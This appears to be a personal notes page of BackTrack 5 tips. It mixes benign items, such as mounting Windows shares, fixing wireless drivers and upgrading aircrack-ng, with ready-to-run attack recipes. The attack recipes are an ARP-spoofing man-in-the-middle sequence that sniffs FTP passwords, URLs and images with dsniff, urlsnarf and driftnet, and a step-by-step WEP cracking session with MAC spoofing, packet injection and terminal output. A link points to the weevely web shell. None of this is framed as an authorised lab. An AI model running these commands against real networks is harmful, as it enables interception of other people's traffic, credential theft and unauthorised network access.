Man In The Middle Attack

arpspoof -t 192.168.1.101 192.168.1.1

arpspoof -t 192.168.1.1 192.168.1.101

echo 1 > /proc/sys/net/ipv4/ip_forward

urlsnarf -i eth1                                  – for urls

or

driftnet -i eth1                                      – for images

or

dsniff -i eth1                                        – for ftp passwords

weevely

http://www.youtube.com/watch?v=vcGw1XX-I94&feature=related

Nessus on BT5

http://pauldotcom.com/2011/05/activating-nessus-on-backtrack.html

Mounting Windows Shares In Linux

http://industriousone.com/blog/mounting-windows-shares-linux

 

Mounting Windows Shares In Linux

starkos | 20 Apr 2006

I want to access the music collection on our big Windows XP-running game-playing desktop PC from my recycled Linux laptop down in the basement. I found a lot of information on connecting to a Linux file server from a Windows client, but not much on going the other way round. A bit here, and bit there, and this is what I came up with.

First, edit your /etc/hosts file and give the Windows machine a name:

192.168.1.2   pootie

Next, install the samba and smbfs packages using your method of choice.

Create a directory where the share will appear on your local filesystem.

$ sudo mkdir /mnt/music

Edit /etc/fstab and add a line for the mount. Here “pootie” is the name of the machine and “music” is the name of the share.

//pootie/music  /mnt/music  cifs exec,credentials=/etc/cifspw 0 0

Create a password file /etc/cifspw with the login credentials for your Windows account.

username=Jason
password=ImNotGonnaTellYouThat

And secure the file:

$ sudo chmod 600 /etc/cifspw

Giddyup.

$ sudo mount -a

Update: If you’re still stuck, check out this page on the Ubuntu wiki for more tips.

Install and run VLC as root in Backtrack

apt-get install vlc

it is not run under root

to run under root do this :

hexedit /usr/bin/vlc

this line we need to edit :

00000620   65 74 00 67  65 74 65 75  69 64 00 5F  5F 6C 69 62  et.geteuid.__lib

to this line :

00000620   65 74 00 67  65 74 70 70  69 64 00 5F  5F 6C 69 62  et.getppid.__lib

Ctrl+X

Aircrack-ng update to 1.1

http://www.aircrack-ng.org/doku.php?id=install_aircrack#installing_aircrack-ng_from_source

sudo apt-get install build-essential

sudo apt-get install libssl-dev

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 
tar -zxvf aircrack-ng-1.1.tar.gz cd aircrack-ng-1.1
make
make install

Wifi WEP crack in BT5

root@bt:~# airmon-ng

Interface    Chipset        Driver

eth1        Intel 2200BG    ipw2200 – [phy0]
wlan0        Ralink 2573 USB    rt73usb – [phy4]

root@bt:~# airmon-ng start wlan0

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1431    dhclient3
1522    dhclient3
1659    wpa_supplicant
1689    dhclient
1721    dhclient
24143    dhclient3
Process with PID 1522 (dhclient3) is running on interface eth1
Process with PID 1659 (wpa_supplicant) is running on interface eth1
Process with PID 1721 (dhclient) is running on interface eth1
Process with PID 24103 (ifup) is running on interface wlan0
Process with PID 24143 (dhclient3) is running on interface wlan0

Interface    Chipset        Driver

eth1        Intel 2200BG    ipw2200 – [phy0]
wlan0        Ralink 2573 USB    rt73usb – [phy4]
(monitor mode enabled on mon0)

root@bt:~# ifconfig mon0 down
root@bt:~# macchanger — mac 00:11:22:33:44:55 mon0
Current MAC: 00:0e:2e:f3:e1:18 (Edimax Technology Co., Ltd.)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)
root@bt:~# ifconfig mon0 up

root@bt:~# airodump-ng mon0

Copy BSSID and Channel

root@bt:~# airodump-ng -c 1 -w Galina — bssid 00:1B:9E:A7:69:52 mon0

-w (filename)

root@bt:~# aireplay-ng -1 0 -a  00:1B:9E:A7:69:52 -h 00:11:22:33:44:55 -e Galina mon0
14:35:30  Waiting for beacon frame (BSSID: 00:1B:9E:A7:69:52) on channel 1

14:35:30  Sending Authentication Request (Open System) [ACK]
14:35:30  Authentication successful
14:35:30  Sending Association Request [ACK]
14:35:30  Association successful 🙂 (AID: 1)

-e (Network Name)

root@bt:~# aireplay-ng -3 -b  00:1B:9E:A7:69:52 -h 00:11:22:33:44:55 mon0
14:38:15  Waiting for beacon frame (BSSID: 00:1B:9E:A7:69:52) on channel 1
Saving ARP requests in replay_arp-0120-143815.cap
You should also start airodump-ng to capture replies.
Read 629 packets (got 0 ARP requests and 0 ACKs), sent 0 packets…(0 pps)

root@bt:~# aircrack-ng -b 00:1B:9E:A7:69:52 Galina-01.cap

ATI Radeon 7500 on BT5

In Synaptic install fglrx.

Make ipw2200 works in BT5

http://mendrugox.xerminator.dyndns.org/2011/10/make-ipw2200-works-in-bt5/

I like to use an old laptop in which I’ve installed BT5. From being an useless thing inside a closet it has become a wonderful tool for me nowadays. Although I’ve a neat Alpha AWUS036H card,  it was reasonable that I wanted that its internal ipw2200bg card worked too. That is something that doesn’t happen when you run BT5 with its default configuration.

If we run dmesg we’ll see that our internal card is detected but something is happening with its firmware.

ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
ipw2200: ipw2200-bss.fw request_firmware failed: Reason -2
ipw2200: Unable to load firmware: -2
ipw2200: failed to register network device

To solve this issue we have to download the latest firmware for the card. You can get it from the official site http://ipw2200.sourceforge.net/firmware.php. I’ve uploaded the latest version at present, 3.1, so you can get it directly from here: ipw2200-fw-3.1.

Once you get it extract the firmware files:

tar xvfz ipw2200-fw-3.1.tgz

Copy the .fw files to /lib/firmware:

cp ipw2200-fw-3.1/*.fw /lib/firmware/

Reset the driver:

modprobe -r ipw2200

modprobe ipw2200

Done.

Enjoy.

My comment : You need to change :

WICD Network Manager  -> Preferences  ->  Wireless interface : eth1